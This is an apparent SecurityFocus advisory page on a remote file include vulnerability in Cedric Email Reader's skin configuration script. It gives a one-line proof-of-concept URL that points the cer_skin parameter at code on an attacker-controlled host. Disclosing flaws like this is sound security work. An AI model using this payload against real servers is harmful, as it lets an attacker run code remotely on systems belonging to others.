Cedric Email Reader Skin Configuration Script Remote File Include Vulnerability

This vulnerability may be exploited using a web browser.

MGhz <magas@mail.lt> contributed the following proof of concept code:

http://[target]/email.php?login=attacker&cer_skin=http://[attacker]/code.php


 

Privacy Statement
Copyright 2010, SecurityFocus